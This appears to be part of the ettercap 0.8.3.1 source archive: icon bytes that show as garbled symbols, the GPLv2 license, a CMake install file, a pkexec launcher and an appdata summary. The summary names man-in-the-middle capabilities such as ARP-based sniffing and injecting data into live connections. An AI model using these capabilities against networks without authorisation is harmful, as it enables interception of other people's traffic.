@ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿν­ÿν­ÿν­ÿε¥ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿçÞÎÿν­ÿ¥„kÿ¥Œsÿ­Œsÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿε¥ÿ¥Œsÿ­Œsÿ¥Œsÿ­Œsÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿν­ÿ¥Œsÿ­Œsÿ¥Œsÿ­ŒsÿÿÿÿÿÿÿÿÿÿÿŒsZÿŒsZÿŒsZÿŒsZÿŒsZÿŒsZÿÿÿÿÿε¥ÿµœ„ÿ¥Œsÿ­Œsÿ¥Œsÿÿÿÿÿÿÿÿÿÿÿ­Œsÿ¥Œsÿ­Œsÿ¥Œsÿ­Œsÿ¥ŒsÿÿÿÿÿÖνÿε¥ÿµœ„ÿ¥Œsÿ­Œsÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ­Œsÿÿÿÿÿÿÿÿÿν­ÿν­ÿν­ÿ½¥”ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ­ŒsÿÿÿÿÿÿÿÿÿÿÿÿÿÖνÿν­ÿν­ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ¥Œsÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ÷÷ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿµœŒÿ½½½ÿÿÿÿÿÿÿÿÿÎÎÎÿÿÿÿÿÿÿÿŒŒŒÿJJJÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ{{{ÿ¥¥¥ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿœœœÿÿÿÿÿÿÿÿÿRRRÿJJJÿµµµÿ­­­ÿÿÿÿÿÿÿÿÿÿÿÿÿ„„„ÿ)))ÿÿÿÿÿÿZZZÿµµµÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ999ÿÿÿÿÿÿÿÿ!!!ÿÿÿÿÿÿÿÿ( @ €ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ÷ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÞÖÎÿν­ÿƵ¥ÿƵ¥ÿƵ¥ÿƵ¥ÿƵ¥ÿ¥”ŒÿJJJÿZZZÿZZZÿcccÿZZZÿZZZÿRRRÿZZZÿRRRÿZZZÿRRRÿZZZÿRRRÿZZZÿZZZÿZZZÿZZZÿZZZÿcccÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿν­ÿν­ÿƵ¥ÿν­ÿνµÿƵ¥ÿƵ¥ÿƵ¥ÿŒ„sÿÿcccÿkkkÿ{{{ÿ„„„ÿ”””ÿ¥¥¥ÿ¥¥¥ÿ¥¥¥ÿ¥¥¥ÿ¥¥¥ÿ¥¥¥ÿ¥¥¥ÿ¥¥¥ÿ”””ÿ”””ÿŒŒŒÿ„„„ÿ{{{ÿÿÿÿÿÿÿÿÿÿÿÿÿν­ÿν­ÿν­ÿƵ¥ÿµœ„ÿ¥„kÿ¥Œkÿ¥Œkÿ¥ŒkÿŒ{kÿ)))ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÞÖÎÿν¥ÿν­ÿ½­œÿ¥„kÿ­Œsÿ¥Œsÿ­Œsÿ¥Œsÿ­ŒsÿŒ{kÿ)))ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿν­ÿν­ÿ½­œÿ¥Œkÿ­Œsÿ¥Œsÿ­Œsÿ¥Œsÿ­Œsÿ¥ŒsÿŒ{kÿ111ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ÷÷÷ÿƵ¥ÿν­ÿ¥Œsÿ­Œsÿ¥Œsÿ­Œsÿ­”sÿ¥Œsÿ­Œsÿ­ŒsÿŒ{kÿ111ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿçççÿν¥ÿ½­œÿ¥Œkÿ­Œsÿ¥Œsÿ­Œsÿ­Œsÿ¥Œsÿ­”sÿ¥ŒsÿŒ{kÿ999ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ999ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿçÖÎÿƵ¥ÿ½¥”ÿ¥Œsÿ­Œsÿ­”sÿ¥Œsÿ­Œsÿ¥Œsÿ­Œsÿ¥ŒsÿŒ{kÿ999ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ!!!ÿZJ9ÿŒ{cÿŒsZÿŒsZÿŒ{cÿŒsZÿŒ{cÿŒsZÿŒ{cÿŒsZÿŒsZÿŒsZÿ{kRÿÿÿÿÿçÞÖÿν­ÿƵ¥ÿ¥„kÿ¥Œsÿ­Œsÿ¥Œsÿ­”sÿ­Œsÿ¥Œsÿ­ŒsÿŒ{kÿ999ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿkZJÿ­Œsÿ­Œsÿ¥Œsÿ­”sÿ¥Œsÿ­Œsÿ¥Œsÿ­Œsÿ­Œsÿ¥Œsÿ­”sÿœ{kÿÿÿÿÿïççÿν­ÿν­ÿµœ„ÿ¥Œsÿ­Œsÿ¥Œsÿ­Œsÿ¥Œsÿ­Œsÿ¥ŒsÿŒ{kÿBBBÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿkZJÿ­Œsÿ¥Œsÿ­Œsÿ­Œsÿ¥Œsÿ­Œsÿ¥Œsÿ­Œsÿ¥Œsÿ­Œsÿ¥Œsÿœ{kÿÿÿÿÿÿÿÿÿν­ÿƵ¥ÿν­ÿ­”{ÿ¥Œsÿ­Œsÿ¥Œsÿ­Œsÿ­”sÿ¥ŒsÿŒ{kÿBBBÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ!!!ÿB9)ÿkZJÿkZJÿcRBÿcRBÿkRBÿkZJÿcRBÿkZJÿkZJÿ„kZÿ¥Œsÿœ„kÿÿÿÿÿÿÿÿÿÖνÿε¥ÿν­ÿν­ÿµœ„ÿ¥Œsÿ­Œsÿ¥Œsÿ­Œsÿ¥ŒsÿŒ{kÿJJJÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿRRRÿ111ÿBBBÿJJJÿcccÿsssÿZZZÿJJJÿ999ÿ111ÿÿB9)ÿ¥Œsÿœ{kÿÿÿÿÿÿÿÿÿ÷ïïÿƵ¥ÿν­ÿν­ÿƵ¥ÿƵ¥ÿ­”{ÿ¥Œsÿ­Œsÿ¥ŒsÿŒ{kÿJJJÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ„„„ÿ91)ÿ­Œsÿœ„kÿÿÿÿÿÿÿÿÿÿÿÿÿÞÖÎÿν­ÿν¥ÿν­ÿν­ÿν­ÿƵ¥ÿ½¥”ÿ¥ŒsÿŒ{kÿRRRÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿœœœÿ91!ÿ¥Œsÿœ{kÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÞÖÎÿƵ¥ÿν­ÿν­ÿν­ÿƵ¥ÿν­ÿν­ÿŒ„{ÿRRRÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ”””ÿ91)ÿ­Œsÿœ„kÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ÷÷÷ÿÖνÿƵ¥ÿν­ÿν­ÿν­ÿν­ÿŒ„{ÿRRRÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ„„„ÿB9)ÿ¥Œsÿœ{kÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ÷÷÷ÿçÞÎÿν­ÿƵ¥ÿƵ¥ÿŒ„{ÿRRRÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿRRRÿ111ÿ111ÿBBBÿJRRÿZRRÿZZZÿZZZÿJJJÿ999ÿÿ91)ÿ­Œsÿœ„kÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ÷÷÷ÿçÞÎÿŒ„„ÿJJJÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ999ÿZRJÿ„{sÿŒ{sÿ„{sÿŒ„sÿ„{sÿŒ{sÿ„{sÿŒ„sÿ„{sÿœŒ{ÿµœŒÿœŒ{ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿïïïÿÎÎÎÿçççÿçççÿçççÿœœœÿBBBÿçççÿ÷÷÷ÿÿÿÿÿÿÿÿÿ999ÿ„{sÿƽµÿƽµÿƽµÿƽµÿƽµÿƽµÿƽµÿƽµÿƽµÿƽµÿƽµÿµ­¥ÿ½½½ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÎÎÎÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿŒŒŒÿÿÿÿÿJJJÿ¥¥¥ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿçççÿÿïïïÿÿÿÿÿ111ÿ!!!ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿçççÿÿÿÿÿÿÿÿÿBBBÿÿÞÞÞÿ999ÿ¥¥¥ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿçççÿÿïïïÿÿÿÿÿBBBÿÿ{{{ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÞÞÞÿ{{{ÿ999ÿ¥¥¥ÿÿÿÿÿÿRRRÿBBBÿ¥¥¥ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿçççÿÿïïïÿÿÿÿÿBBBÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿJJJÿÿÿÿÿÿÿÿÿÿŒŒŒÿÿ111ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿïïïÿÿÿÿÿ{{{ÿœœœÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿRRRÿÿÿÿÿJJJÿBBBÿµµµÿ­­­ÿ­­­ÿÿÿÿÿÿ÷÷÷ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ÷÷÷ÿÿïïïÿÿÿÿÿÿÿÿÿÿÿÿÿçççÿÎÎÎÿÿÿÿÿÿÿÿÿÿRRRÿÿÿÿÿJJJÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿïïïÿÿÿÿÿÿÿÿÿ„„„ÿÿ111ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿcccÿcccÿµµµÿÿÿÿÿÿÿÿÿBBBÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿïïïÿÿÿÿÿ111ÿÿÿ999ÿÿÿÿÿÿÿÿÿÿÿBBBÿÿÿÿÿÿÿÿÿÿÿÿÿÖÖÖÿÿçççÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÖÖÖÿÿÿÿÿ999ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ!!!ÿÆÆÆÿœœœÿ¥¥¥ÿ¥¥¥ÿµµµÿµµµÿ½½½ÿ½½½ÿ½½½ÿÆÆÆÿ½½½ÿÆÆÆÿÆÆÆÿÆÆÆÿÎÎÎÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ!!!ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿettercap-0.8.3.1/contrib/nsis/license.txt000664 000000 000000 00000043777 13711276346 020303 0ustar00rootroot000000 000000 GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Lesser General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. , 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. ettercap-0.8.3.1/desktop/000775 000000 000000 00000000000 13711276346 015133 5ustar00rootroot000000 000000 ettercap-0.8.3.1/desktop/CMakeLists.txt000664 000000 000000 00000000634 13711276346 017676 0ustar00rootroot000000 000000 if(ENABLE_GTK) configure_file(org.pkexec.ettercap.policy.in ${PKEXEC_INSTALL_WRAPPER}.policy @ONLY) install(FILES ${CMAKE_CURRENT_BINARY_DIR}/${PKEXEC_INSTALL_WRAPPER}.policy DESTINATION ${POLKIT_DIR}) install(FILES ettercap.desktop DESTINATION ${DESKTOP_DIR}) install(FILES ettercap.metainfo.xml DESTINATION ${METAINFO_DIR}) install(PROGRAMS ettercap-pkexec DESTINATION ${INSTALL_BINDIR}) endif() ettercap-0.8.3.1/desktop/ettercap-pkexec000775 000000 000000 00000000072 13711276346 020144 0ustar00rootroot000000 000000 #!/bin/sh pkexec --disable-internal-agent "ettercap" "$@" ettercap-0.8.3.1/desktop/ettercap.appdata.xml000664 000000 000000 00000002712 13711276346 021077 0ustar00rootroot000000 000000 ettercap.desktop CC0-1.0 GPL-2.0 Ettercap Multipurpose Network sniffer/analyser/interceptor/logger

Ettercap supports active and passive dissection of many protocols (even encrypted ones) and includes many feature for network and host analysis. Data injection in an established connection and filtering (substitute or drop a packet) on the fly is also possible, keeping the connection synchronized.

Many sniffing modes are implemented, for a powerful and complete sniffing suite. It is possible to sniff in four modes: IP Based, MAC Based, ARP Based (full-duplex) and PublicARP Based (half-duplex). Ettercap also has the ability to detect a switched LAN, and to use OS fingerprints (active or passive) to find the geometry of the LAN.

